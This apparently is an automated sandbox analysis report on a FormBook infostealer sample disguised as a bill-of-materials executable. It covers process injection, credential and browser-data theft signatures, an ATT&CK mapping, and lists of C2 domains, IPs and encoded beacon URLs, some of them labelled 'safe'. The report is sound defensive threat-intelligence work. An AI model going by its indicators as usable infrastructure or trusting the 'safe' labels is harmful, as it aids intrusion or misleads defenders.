report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Copy of 01. Bill of Material - 705.exe | Binary or memory string: WIN_XPe
Source: Copy of 01. Bill of Material - 705.exe | Binary or memory string: WIN_VISTA
Source: Copy of 01. Bill of Material - 705.exe | Binary or memory string: WIN_7
Source: Copy of 01. Bill of Material - 705.exe | Binary or memory string: WIN_8

            Remote Access Functionality

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.4642142846.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4651757327.00000000044D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2525577951.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2527501783.0000000006980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4654251110.00000000056E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4651596001.0000000002BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4651797494.0000000002EF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2526291195.0000000003C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Code function: 0_2_003B1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Code function: 0_2_003B1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
MITRE ATT&CK Matrix

The matrix is a 14-column grid in the original page; it is listed here per tactic. A leading number is the count of signatures mapped to that technique; entries without a number are part of the matrix grid but had no matching signature.

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising
Initial Access: 2 Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application
Execution: 1 Native API, Scheduled Task/Job, At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job, Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading, 2 Valid Accounts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At
Privilege Escalation: 1 Exploitation for Privilege Escalation, 1 Abuse Elevation Control Mechanism, 1 DLL Side-Loading, 2 Valid Accounts, 21 Access Token Manipulation, 412 Process Injection, Startup Items, Scheduled Task/Job, At
Defense Evasion: 1 Disable or Modify Tools, 1 Deobfuscate/Decode Files or Information, 1 Abuse Elevation Control Mechanism, 3 Obfuscated Files or Information, 1 DLL Side-Loading, 2 Valid Accounts, 12 Virtualization/Sandbox Evasion, 21 Access Token Manipulation, 412 Process Injection
Credential Access: 1 OS Credential Dumping, 21 Input Capture, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow
Discovery: 2 System Time Discovery, 1 Account Discovery, 2 File and Directory Discovery, 116 System Information Discovery, 241 Security Software Discovery, 12 Virtualization/Sandbox Evasion, 3 Process Discovery, 11 Application Window Discovery, 1 System Owner/User Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections
Collection: 1 Archive Collected Data, 1 Data from Local System, 1 Email Collection, 21 Input Capture, 3 Clipboard Data, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged
Command and Control: 5 Ingress Tool Transfer, 1 Encrypted Channel, 5 Non-Application Layer Protocol, 5 Application Layer Protocol, Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement
Behavior Graph (ID: 1497886; Sample: Copy of 01. Bill of Materia...; Startdate: 23/08/2024; Architecture: WINDOWS; Score: 100). The graph image is not reproduced on this page; its nodes and edges are listed as text.

Top level: www.jaxo.xyz, www.weep.site, 18 other IPs or domains. Signatures: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; Yara detected FormBook; 6 other signatures. www.jaxo.xyz: Performs DNS queries to domains with low reputation.
Copy of 01. Bill of Material - 705.exe (started; node annotation 4): Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process. Starts svchost.exe.
svchost.exe: Maps a DLL or memory area into another process. Injects into GQXHQykfhUHHi.exe.
GQXHQykfhUHHi.exe (injected): Found direct / indirect Syscall (likely to bypass EDR). Starts rasdial.exe.
rasdial.exe (started; node annotation 13): Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures. Injects into GQXHQykfhUHHi.exe; starts firefox.exe.
GQXHQykfhUHHi.exe (injected by rasdial.exe): Found direct / indirect Syscall (likely to bypass EDR). Network: www.jaxo.xyz 66.29.149.180, ports 49738, 49739, 49740 (ADVANTAGECOMUS, United States); tadalaturbo.online 192.185.211.122, ports 49772, 49773, 49774 (UNIFIEDLAYER-AS-1US, United States); 12 other IPs or domains.

Source | Detection | Scanner
Copy of 01. Bill of Material - 705.exe | 39% | ReversingLabs
Copy of 01. Bill of Material - 705.exe | 29% | Virustotal
Copy of 01. Bill of Material - 705.exe | 100% | Joe Sandbox ML
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner
tadalaturbo.online | 1% | Virustotal
fontanerourgente.net | 0% | Virustotal
weep.site | 2% | Virustotal
www.anaidittrich.com | 0% | Virustotal
www.xforum.tech | 1% | Virustotal
www.jaxo.xyz | 1% | Virustotal
32wxd.top | 0% | Virustotal
www.taapbit.online | 1% | Virustotal
www.jiyitf.top | 1% | Virustotal
www.tadalaturbo.online | 1% | Virustotal
www.onlytradez.club | 2% | Virustotal
www.32wxd.top | 1% | Virustotal
www.88nn.pro | 0% | Virustotal
www.weep.site | 1% | Virustotal
www.fontanerourgente.net | 0% | Virustotal
Source | Detection | Scanner | Label
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
https://api.w.org/ | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
https://mgmasistencia.com/acerca-de/ | 0% | Avira URL Cloud | safe
https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe
http://www.anaidittrich.com/qpwk/ | 0% | Avira URL Cloud | safe
http://mgmasistencia.com/wp-includes/css/dist/block-library/style.min.css?ver=6.6.1 | 0% | Avira URL Cloud | safe
https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe
http://mgmasistencia.com/wp-content/themes/twentytwentyone/style.css?ver=1.4 | 0% | Avira URL Cloud | safe
https://duckduckgo.com/chrome_newtab | 0% | Virustotal
https://duckduckgo.com/ac/?q= | 0% | Virustotal
https://mgmasistencia.com/ | 0% | Avira URL Cloud | safe
http://mgmasistencia.com/wp-includes/css/dist/block-library/style.min.css?ver=6.6.1 | 0% | Virustotal
http://www.cannulafactory.top/l90v/?Xn70_=65tz+8+CHtIdUwlI5J0Rvcw20Xa7qh/y7kK7USWOBh85j9WcKbCPI7UII3emD6Kks24YSbVOAcNXIRb+3rSlPhO14vaNX6GX5zyvmtdMAZdMTyJ7S8cUtjW2YAh8fb9spiiUzBk=&mV=ZpN4DLSXOzy8qX | 0% | Avira URL Cloud | safe
https://tilda.cc | 0% | Avira URL Cloud | safe
http://www.anaidittrich.com/qpwk/?mV=ZpN4DLSXOzy8qX&Xn70_=Pn8OF1j/flre3VeYQ8gIXKcN0tGdbcqXadgaNymjhjlyVvhoWwCe/sZUerDBeXD1/Dp7mYeP8BtJLpf3hF/3m/h5NM1/Dot3Sot4/3V0qZLtTBV8KMhP3aG6aVWI0GSP3d0EJgo= | 0% | Avira URL Cloud | safe
http://www.cannulafactory.top/l90v/ | 0% | Avira URL Cloud | safe
https://mgmasistencia.com/ | 0% | Virustotal
http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign= | 0% | Avira URL Cloud | safe
http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/polyfills.js?ver=1.4 | 0% | Avira URL Cloud | safe
https://twitter.com/wordpress | 0% | Avira URL Cloud | safe
https://tilda.cc | 1% | Virustotal
https://mgmasistencia.com/blog/ | 0% | Avira URL Cloud | safe
http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign= | 0% | Virustotal
http://www.ayypromo.shop/rgqx/ | 0% | Avira URL Cloud | safe
http://mgmasistencia.com/wp-content/themes/twentytwentyone/style.css?ver=1.4 | 0% | Virustotal
http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/polyfills.js?ver=1.4 | 0% | Virustotal
https://es.wordpress.org/ | 0% | Avira URL Cloud | safe
https://twitter.com/wordpress | 0% | Virustotal
http://www.xforum.tech/647x/ | 0% | Avira URL Cloud | safe
https://mgmasistencia.com/2021/08/30/hola-mundo/ | 0% | Avira URL Cloud | safe
http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/css/print.css?ver=1.4 | 0% | Avira URL Cloud | safe
http://nginx.net/ | 0% | Avira URL Cloud | safe
https://mgmasistencia.com/acerca-de/ | 0% | Virustotal
https://mgmasistencia.com/blog/ | 0% | Virustotal
https://mgmasistencia.com/2021/08/30/hola-mundo/ | 0% | Virustotal
http://www.jiyitf.top/uhl0/?Xn70_=ncGfyjKG78FJ3RohSJv2gscu+FHk/nvAJl3DW65koN/XsollpddV5N2bVVuKdzPyIkh4e3ZVd/UrgbHQf7fI9cbDzTo3eIPvJ/69OYqbKv/aNBrOYFR5SHm/7G6NRslCZscJ8Q0=&mV=ZpN4DLSXOzy8qX | 0% | Avira URL Cloud | safe
https://es.wordpress.org/ | 0% | Virustotal
http://www.onlytradez.club/zctj/ | 0% | Avira URL Cloud | safe
http://www.onlytradez.club/zctj/?Xn70_=tSuw7IYRRjv+wnLRJKBizfUbw5DKe+pV3SuosHDPhpHVIQ9U3bF8KrgVZ9eofhuzjMlHgMWokK5nneJg1eEhfsOfW9Q7idqDaQ0/bUKrb6lVOs08wJGK3g6GM4oAhkBtSiykhk4=&mV=ZpN4DLSXOzy8qX | 0% | Avira URL Cloud | safe
http://www.32wxd.top/kyiu/ | 0% | Avira URL Cloud | safe
http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js?ver=1.4 | 0% | Avira URL Cloud | safe
https://mgmasistencia.com/comments/feed/ | 0% | Avira URL Cloud | safe
https://mgmasistencia.com/wp-json/ | 0% | Avira URL Cloud | safe
https://www.551108k5.shop/0or4/?Xn70_=Ap9XVhmqGkofKqiV5m9YIo/ | 0% | Avira URL Cloud | safe
http://www.88nn.pro/l4rw/ | 0% | Avira URL Cloud | safe
http://www.88nn.pro/l4rw/?Xn70_=ZXNQqBP58JXIf3ltP6wut8CCjedJLF5l9UucInMS2YFRqgKt0pQ9Lq2gj3LI6pyb9XKzluqnMvvmNnss5NGj4J8VLwdTZn5p64yovrdSdmFXVLBYTbU+6U99coUT9vxRPQh+Kno=&mV=ZpN4DLSXOzy8qX | 0% | Avira URL Cloud | safe
http://mgmasistencia.com/wp-content/uploads/2021/09/fondo-plumber-1000x429-1.jpg | 0% | Avira URL Cloud | safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe
http://www.datensicherung.email/gs9g/ | 0% | Avira URL Cloud | safe
http://www.jiyitf.top/uhl0/ | 0% | Avira URL Cloud | safe
https://mgmasistencia.com/contacto/ | 0% | Avira URL Cloud | safe
http://www.32wxd.top/kyiu/?Xn70_=XDGtsL25HTw6JP64VC7y2QrABH1070ZVn4NdqHGWC1gt1eOjH+BVmk6PIm5PWw2c27Ak8m93WqRL2MBomZszHLGx0l4jqt7JLz8z3pwCpHaPnAKrE0wOd8iQCO012svuMCQv9qI=&mV=ZpN4DLSXOzy8qX | 0% | Avira URL Cloud | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe
http://www.xforum.tech/647x/?mV=ZpN4DLSXOzy8qX&Xn70_=FnaXBox54+ag7g5huWPEmVuBH/Jm8y343eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUpgzDZpO2xsWAnZCQe5aiqUqIaOEJzM3y652oxbgTObGuSO3B10Kw= | 0% | Avira URL Cloud | safe
http://www.datensicherung.email/gs9g/?Xn70_=1tUju/dHge3HLZSdE2k0YsxyInHY2hrxyQikSChTyVI6tApcYR3Jee2z9yFvFCdZtAxjWN4NnVxgCMN8Nn90+uGeV46P8z2dJC38PhOXMX6lRwcpgLQeWu7EugNpVbCb7i9ISyk=&mV=ZpN4DLSXOzy8qX | 0% | Avira URL Cloud | safe
http://www.jaxo.xyz/f9bc/ | 0% | Avira URL Cloud | safe
https://mgmasistencia.com/feed/ | 0% | Avira URL Cloud | safe
http://www.tadalaturbo.online | 0% | Avira URL Cloud | safe
http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/primary-navigation.js?ver=1.4 | 0% | Avira URL Cloud | safe
http://www.fontanerourgente.net/t3gh/?Xn70_=d/YHbjU0lRTRkwDy0zIPv6PdUN2QowQER5WtK+J3r0U/ADUIPiMSea/+ySZyWjMipb/6l9jjBkeXWJl7BthetgJD5Cj99fT73mV1toZHsOXJ+4nrRaepQcEbq6LCfz7oYbWletg=&mV=ZpN4DLSXOzy8qX | 0% | Avira URL Cloud | safe
http://www.redhat.com/docs/manuals/enterprise/ | 0% | Avira URL Cloud | safe
http://www.tadalaturbo.online/7o3y/?mV=ZpN4DLSXOzy8qX&Xn70_=34bWgTnU4AX1gKZpgT03P58mZraF9WQxUDpx7/bRsS0fRbM850xuSZ+vkJ4N+S3djb8r5M9tcI2Ggb3yyq8UwsXUXfif+FOOr40nRowl+nZyE3/KMRkY0oHOpy0tGVDF3Z+R9aA= | 0% | Avira URL Cloud | safe
https://wordpress.org/ | 0% | Avira URL Cloud | safe
http://www.fontanerourgente.net/t3gh/ | 0% | Avira URL Cloud | safe
https://www.hostgator.com.br | 0% | Avira URL Cloud | safe
http://www.tadalaturbo.online/7o3y/ | 0% | Avira URL Cloud | safe
https://mgmasistencia.com/2021/08/30/hola-mundo/#comment-1 | 0% | Avira URL Cloud | safe
http://www.551108k5.shop/0or4/ | 0% | Avira URL Cloud | safe
https://mgmasistencia.com/xmlrpc.php?rsd | 0% | Avira URL Cloud | safe
http://www.xforum.tech/647x/?mV=ZpN4DLSXOzy8qX&Xn70_=FnaXBox54 | 0% | Avira URL Cloud | safe
http://www.redhat.com/ | 0% | Avira URL Cloud | safe
http://anaidittrich.com/qpwk/?mV=ZpN4DLSXOzy8qX&Xn70_=Pn8OF1j/flre3VeYQ8gIXKcN0tGdbcqXadgaNymjhjlyVv | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.ayypromo.shop | 176.57.64.102 | true | false | | unknown
tadalaturbo.online | 192.185.211.122 | true | false | | unknown
fontanerourgente.net | 37.187.158.211 | true | false | | unknown
weep.site | 194.233.65.154 | true | false | | unknown
www.cannulafactory.top | 18.183.3.45 | true | false | | unknown
www.anaidittrich.com | 162.55.254.209 | true | false | | unknown
gangli.ssywan.com | 64.64.237.133 | true | false | | unknown
www.xforum.tech | 103.224.182.242 | true | false | | unknown
www.datensicherung.email | 85.13.151.9 | true | false | | unknown
www.jaxo.xyz | 66.29.149.180 | true | true | | unknown
32wxd.top | 206.119.82.116 | true | false | | unknown
www.jiyitf.top | 172.67.215.136 | true | false | | unknown
www.onlytradez.club | 167.172.133.32 | true | false | | unknown
www.88nn.pro | 45.157.69.194 | true | false | | unknown
www.551108k5.shop | unknown | unknown | true | | unknown
www.taapbit.online | unknown | unknown | true | | unknown
www.tadalaturbo.online | unknown | unknown | true | | unknown
www.32wxd.top | unknown | unknown | true | | unknown
www.weep.site | unknown | unknown | true | | unknown
www.fontanerourgente.net | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.anaidittrich.com/qpwk/ | false | Avira URL Cloud: safe | unknown
http://www.cannulafactory.top/l90v/?Xn70_=65tz+8+CHtIdUwlI5J0Rvcw20Xa7qh/y7kK7USWOBh85j9WcKbCPI7UII3emD6Kks24YSbVOAcNXIRb+3rSlPhO14vaNX6GX5zyvmtdMAZdMTyJ7S8cUtjW2YAh8fb9spiiUzBk=&mV=ZpN4DLSXOzy8qX | false | Avira URL Cloud: safe | unknown
http://www.anaidittrich.com/qpwk/?mV=ZpN4DLSXOzy8qX&Xn70_=Pn8OF1j/flre3VeYQ8gIXKcN0tGdbcqXadgaNymjhjlyVvhoWwCe/sZUerDBeXD1/Dp7mYeP8BtJLpf3hF/3m/h5NM1/Dot3Sot4/3V0qZLtTBV8KMhP3aG6aVWI0GSP3d0EJgo= | false | Avira URL Cloud: safe | unknown
http://www.cannulafactory.top/l90v/ | false | Avira URL Cloud: safe | unknown
http://www.ayypromo.shop/rgqx/ | false | Avira URL Cloud: safe | unknown
http://www.xforum.tech/647x/ | false | Avira URL Cloud: safe | unknown
http://www.jiyitf.top/uhl0/?Xn70_=ncGfyjKG78FJ3RohSJv2gscu+FHk/nvAJl3DW65koN/XsollpddV5N2bVVuKdzPyIkh4e3ZVd/UrgbHQf7fI9cbDzTo3eIPvJ/69OYqbKv/aNBrOYFR5SHm/7G6NRslCZscJ8Q0=&mV=ZpN4DLSXOzy8qX | false | Avira URL Cloud: safe | unknown
http://www.onlytradez.club/zctj/ | false | Avira URL Cloud: safe | unknown
http://www.onlytradez.club/zctj/?Xn70_=tSuw7IYRRjv+wnLRJKBizfUbw5DKe+pV3SuosHDPhpHVIQ9U3bF8KrgVZ9eofhuzjMlHgMWokK5nneJg1eEhfsOfW9Q7idqDaQ0/bUKrb6lVOs08wJGK3g6GM4oAhkBtSiykhk4=&mV=ZpN4DLSXOzy8qX | false | Avira URL Cloud: safe | unknown
http://www.32wxd.top/kyiu/ | false | Avira URL Cloud: safe | unknown
http://www.88nn.pro/l4rw/ | false | Avira URL Cloud: safe | unknown
http://www.88nn.pro/l4rw/?Xn70_=ZXNQqBP58JXIf3ltP6wut8CCjedJLF5l9UucInMS2YFRqgKt0pQ9Lq2gj3LI6pyb9XKzluqnMvvmNnss5NGj4J8VLwdTZn5p64yovrdSdmFXVLBYTbU+6U99coUT9vxRPQh+Kno=&mV=ZpN4DLSXOzy8qX | false | Avira URL Cloud: safe | unknown
http://www.datensicherung.email/gs9g/ | false | Avira URL Cloud: safe | unknown
http://www.jiyitf.top/uhl0/ | false | Avira URL Cloud: safe | unknown
http://www.32wxd.top/kyiu/?Xn70_=XDGtsL25HTw6JP64VC7y2QrABH1070ZVn4NdqHGWC1gt1eOjH+BVmk6PIm5PWw2c27Ak8m93WqRL2MBomZszHLGx0l4jqt7JLz8z3pwCpHaPnAKrE0wOd8iQCO012svuMCQv9qI=&mV=ZpN4DLSXOzy8qX | false | Avira URL Cloud: safe | unknown
http://www.xforum.tech/647x/?mV=ZpN4DLSXOzy8qX&Xn70_=FnaXBox54+ag7g5huWPEmVuBH/Jm8y343eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUpgzDZpO2xsWAnZCQe5aiqUqIaOEJzM3y652oxbgTObGuSO3B10Kw= | false | Avira URL Cloud: safe | unknown
http://www.datensicherung.email/gs9g/?Xn70_=1tUju/dHge3HLZSdE2k0YsxyInHY2hrxyQikSChTyVI6tApcYR3Jee2z9yFvFCdZtAxjWN4NnVxgCMN8Nn90+uGeV46P8z2dJC38PhOXMX6lRwcpgLQeWu7EugNpVbCb7i9ISyk=&mV=ZpN4DLSXOzy8qX | false | Avira URL Cloud: safe | unknown
http://www.jaxo.xyz/f9bc/ | false | Avira URL Cloud: safe | unknown
http://www.fontanerourgente.net/t3gh/?Xn70_=d/YHbjU0lRTRkwDy0zIPv6PdUN2QowQER5WtK+J3r0U/ADUIPiMSea/+ySZyWjMipb/6l9jjBkeXWJl7BthetgJD5Cj99fT73mV1toZHsOXJ+4nrRaepQcEbq6LCfz7oYbWletg=&mV=ZpN4DLSXOzy8qX | false | Avira URL Cloud: safe | unknown
http://www.tadalaturbo.online/7o3y/?mV=ZpN4DLSXOzy8qX&Xn70_=34bWgTnU4AX1gKZpgT03P58mZraF9WQxUDpx7/bRsS0fRbM850xuSZ+vkJ4N+S3djb8r5M9tcI2Ggb3yyq8UwsXUXfif+FOOr40nRowl+nZyE3/KMRkY0oHOpy0tGVDF3Z+R9aA= | false | Avira URL Cloud: safe | unknown
http://www.fontanerourgente.net/t3gh/ | false | Avira URL Cloud: safe | unknown
http://www.tadalaturbo.online/7o3y/ | false | Avira URL Cloud: safe | unknown
http://www.551108k5.shop/0or4/ | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://mgmasistencia.com/wp-includes/css/dist/block-library/style.min.css?ver=6.6.1 | rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://duckduckgo.com/chrome_newtab | rasdial.exe, 00000006.00000003.2714492070.00000000079FE000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | rasdial.exe, 00000006.00000003.2714492070.00000000079FE000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://mgmasistencia.com/acerca-de/ | rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://mgmasistencia.com/wp-content/themes/twentytwentyone/style.css?ver=1.4 | rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://mgmasistencia.com/ | GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://tilda.cc | rasdial.exe, 00000006.00000002.4653099996.0000000005F66000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000044B6000.00000004.00000001.00040000.00000000.sdmp | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | rasdial.exe, 00000006.00000003.2714492070.00000000079FE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign= | rasdial.exe, 00000006.00000002.4653099996.0000000005144000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.0000000003694000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2819411569.0000000023E84000.00000004.80000000.00040000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/polyfills.js?ver=1.4 | rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://twitter.com/wordpress | rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://mgmasistencia.com/blog/ | rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://es.wordpress.org/ | rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://mgmasistencia.com/2021/08/30/hola-mundo/ | rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/css/print.css?ver=1.4 | rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nginx.net/ | rasdial.exe, 00000006.00000002.4653099996.0000000005C42000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.0000000004192000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | rasdial.exe, 00000006.00000003.2714492070.00000000079FE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js?ver=1.4 | rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://mgmasistencia.com/comments/feed/ | rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://mgmasistencia.com/wp-json/ | GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.551108k5.shop/0or4/?Xn70_=Ap9XVhmqGkofKqiV5m9YIo/ | rasdial.exe, 00000006.00000002.4653099996.000000000628A000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000047DA000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://mgmasistencia.com/wp-content/uploads/2021/09/fondo-plumber-1000x429-1.jpg | rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | rasdial.exe, 00000006.00000003.2714492070.00000000079FE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://mgmasistencia.com/contacto/ | rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.w.org/ | GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
